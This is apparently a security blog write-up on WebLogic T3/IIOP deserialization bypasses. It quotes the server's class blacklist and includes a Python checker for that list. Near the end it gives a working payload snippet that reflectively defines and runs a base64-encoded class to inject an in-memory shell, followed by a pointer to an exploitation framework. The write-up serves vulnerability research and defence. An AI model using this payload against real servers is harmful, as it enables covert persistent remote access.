WebLogic T3/IIOP Deserialization Vulnerabilities from 2020 to Now

Note: in the diagram, black lines represent call chains, red lines represent patch fixes, and green lines represent new ways of bypassing a patch.

High-resolution version of the diagram: https://www.processon.com/view/link/610276e7e0b34d496239a82b

Here is the current blacklist:

private static final String[] DEFAULT_BLACKLIST_PACKAGES = new String[]{
    "org.apache.commons.collections.functors",
    "com.sun.org.apache.xalan.internal.xsltc.trax",
    "javassist",
    "java.rmi.activation",
    "sun.rmi.server",
    "com.bea.core.repackaged.springframework.aop.aspectj",
    "com.bea.core.repackaged.springframework.aop.aspectj.annotation",
    "com.bea.core.repackaged.springframework.aop.aspectj.autoproxy",
    "com.bea.core.repackaged.springframework.beans.factory.support",
    "org.python.core",
    "com.bea.core.repackaged.aspectj.weaver.tools.cache",
    "com.bea.core.repackaged.aspectj.weaver.tools",
    "com.bea.core.repackaged.aspectj.weaver.reflect",
    "com.bea.core.repackaged.aspectj.weaver",
    "com.oracle.wls.shaded.org.apache.xalan.xsltc.trax",
    "oracle.eclipselink.coherence.integrated.internal.querying",
    "oracle.eclipselink.coherence.integrated.internal.cache"
};

private static final String[] DEFAULT_BLACKLIST_CLASSES = new String[]{
    "org.codehaus.groovy.runtime.ConvertedClosure",
    "org.codehaus.groovy.runtime.ConversionHandler",
    "org.codehaus.groovy.runtime.MethodClosure",
    "org.springframework.transaction.support.AbstractPlatformTransactionManager",
    "java.rmi.server.UnicastRemoteObject",
    "java.rmi.server.RemoteObjectInvocationHandler",
    "com.bea.core.repackaged.springframework.transaction.support.AbstractPlatformTransactionManager",
    "java.rmi.server.RemoteObject",
    "com.tangosol.coherence.rest.util.extractor.MvelExtractor",
    "java.lang.Runtime",
    "oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor",
    "org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor",
    "org.eclipse.persistence.internal.descriptors.InstanceVariableAttributeAccessor",
    "org.apache.commons.fileupload.disk.DiskFileItem",
    "oracle.jdbc.pool.OraclePooledConnection"
};

private static final String[] DEFAULT_WLS_ONLY_BLACKLIST_PACKAGES = new String[]{
    "com.tangosol.internal.util.invoke",
    "com.tangosol.internal.util.invoke.lambda",
    "com.tangosol.util.extractor",
    "com.tangosol.coherence.rest.util.extractor",
    "com.tangosol.coherence.rest.util",
    "com.tangosol.coherence.component.application.console"
};

private static final String[] DEFAULT_WLS_ONLY_BLACKLIST_CLASSES = new String[]{
    "com.tangosol.util.extractor.ReflectionExtractor",
    "com.tangosol.internal.util.SimpleBinaryEntry"
};
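The following is an added example, not WebLogic's own filter code: a small Python checker that answers the question a defender asks when reading this list, namely whether a given class would be rejected by the blacklist above. The entries are copied from the list as quoted on the page. The matching rule is an assumption made here: a package entry denies classes that sit directly in that package, and a class entry denies exactly that class; this reading is suggested by the list naming subpackages such as `...aop.aspectj.annotation` separately, which would be redundant if subpackages were covered automatically. Array descriptors are reduced to their component type before matching, in the way JEP 290 style filters treat arrays.

```python
"""Check Java class names against the WebLogic deserialization blacklist.

Added example; not WebLogic's ClassFilter. The entries are the ones quoted on
the page. The matching rule (exact package / exact class) is an assumption.
"""

# Entries copied from the blacklist shown on the page.
DEFAULT_BLACKLIST_PACKAGES = [
    "org.apache.commons.collections.functors", "com.sun.org.apache.xalan.internal.xsltc.trax",
    "javassist", "java.rmi.activation", "sun.rmi.server",
    "com.bea.core.repackaged.springframework.aop.aspectj",
    "com.bea.core.repackaged.springframework.aop.aspectj.annotation",
    "com.bea.core.repackaged.springframework.aop.aspectj.autoproxy",
    "com.bea.core.repackaged.springframework.beans.factory.support", "org.python.core",
    "com.bea.core.repackaged.aspectj.weaver.tools.cache", "com.bea.core.repackaged.aspectj.weaver.tools",
    "com.bea.core.repackaged.aspectj.weaver.reflect", "com.bea.core.repackaged.aspectj.weaver",
    "com.oracle.wls.shaded.org.apache.xalan.xsltc.trax",
    "oracle.eclipselink.coherence.integrated.internal.querying",
    "oracle.eclipselink.coherence.integrated.internal.cache",
]
DEFAULT_BLACKLIST_CLASSES = [
    "org.codehaus.groovy.runtime.ConvertedClosure", "org.codehaus.groovy.runtime.ConversionHandler",
    "org.codehaus.groovy.runtime.MethodClosure",
    "org.springframework.transaction.support.AbstractPlatformTransactionManager",
    "java.rmi.server.UnicastRemoteObject", "java.rmi.server.RemoteObjectInvocationHandler",
    "com.bea.core.repackaged.springframework.transaction.support.AbstractPlatformTransactionManager",
    "java.rmi.server.RemoteObject", "com.tangosol.coherence.rest.util.extractor.MvelExtractor",
    "java.lang.Runtime", "oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor",
    "org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor",
    "org.eclipse.persistence.internal.descriptors.InstanceVariableAttributeAccessor",
    "org.apache.commons.fileupload.disk.DiskFileItem", "oracle.jdbc.pool.OraclePooledConnection",
]
DEFAULT_WLS_ONLY_BLACKLIST_PACKAGES = [
    "com.tangosol.internal.util.invoke", "com.tangosol.internal.util.invoke.lambda",
    "com.tangosol.util.extractor", "com.tangosol.coherence.rest.util.extractor",
    "com.tangosol.coherence.rest.util", "com.tangosol.coherence.component.application.console",
]
DEFAULT_WLS_ONLY_BLACKLIST_CLASSES = [
    "com.tangosol.util.extractor.ReflectionExtractor", "com.tangosol.internal.util.SimpleBinaryEntry",
]


def component_type(class_name: str) -> str:
    """Reduce a JVM array descriptor such as '[Lfoo.Bar;' (any depth) to 'foo.Bar'.

    Primitive arrays such as '[B' have no reference component type and are
    returned unchanged, so they never match a package or class entry.
    """
    stripped = class_name.lstrip("[")
    if stripped != class_name and stripped.startswith("L") and stripped.endswith(";"):
        return stripped[1:-1]
    return class_name


def check_class(class_name: str, wls_only: bool = True):
    """Return (denied, reason) for a class name as it would appear in a stream.

    Assumed rule: class entries match exactly; package entries match classes
    whose immediate package equals the entry. wls_only=True adds the
    WLS-only lists as well as the default ones.
    """
    name = component_type(class_name)
    classes = list(DEFAULT_BLACKLIST_CLASSES)
    packages = list(DEFAULT_BLACKLIST_PACKAGES)
    if wls_only:
        classes += DEFAULT_WLS_ONLY_BLACKLIST_CLASSES
        packages += DEFAULT_WLS_ONLY_BLACKLIST_PACKAGES
    if name in classes:
        return True, f"class {name} is blacklisted"
    package = name.rpartition(".")[0]
    if package in packages:
        return True, f"package {package} is blacklisted"
    return False, None


if __name__ == "__main__":
    # Constructed sample names, including an array descriptor and a primitive array.
    for sample in [
        "com.tangosol.util.extractor.ReflectionExtractor",
        "org.apache.commons.collections.functors.InvokerTransformer",
        "[Lorg.codehaus.groovy.runtime.MethodClosure;",
        "[B",
        "java.util.HashMap",
    ]:
        print(sample, "->", check_class(sample))
```

Running the module prints one verdict per constructed sample name; the `reason` string tells you whether the hit came from a class entry or a package entry, which is the distinction that matters when reading a bypass that moves to a sibling class in an unlisted package.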

Practical exploitation: injecting an in-memory shell over WebLogic T3

Thanks to @BeichenDream @r4v3zn

When the target has no outbound network access (DNS lookups fail), we can go further by using a command-echo technique or by injecting an in-memory shell.

Taking MvelExtractor as an example: some of these vulnerabilities allow executing Java code, or calling arbitrary methods on arbitrary classes. In that case we base64-encode the compiled class that contains the key code of the T3 memory-shell injector, then run the following at the point where the vulnerability gives us execution:

var loader = java.lang.Thread.currentThread().getContextClassLoader();
var outputStream = new java.io.ByteArrayOutputStream();
// decode the base64-encoded class bytes (placeholder left as in the original)
outputStream.write(java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer("base64..........."));
// look up ClassLoader.defineClass(byte[], int, int) reflectively
var def = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", java.lang.Class.forName("[B"), java.lang.Integer.TYPE, java.lang.Integer.TYPE);
def.setAccessible(true);
// define the class in the context class loader and run its main method
var clazz = def.invoke(loader, outputStream.toByteArray(), 0, outputStream.size());
clazz.getMethod("main", java.lang.Class.forName("[Ljava.lang.String;")).invoke(null, null);

Then connect with weblogic-framework.

References

https://mp.weixin.qq.com/s/XzlK__YljJ8x21sQkeqA_Q

https://mp.weixin.qq.com/s/wFHhWvnCLm1xcWZIbv6O3A

https://buaq.net/go-56072.html

https://forum.butian.net/share/41

https://paper.seebug.org/1280/#cve-2020-14645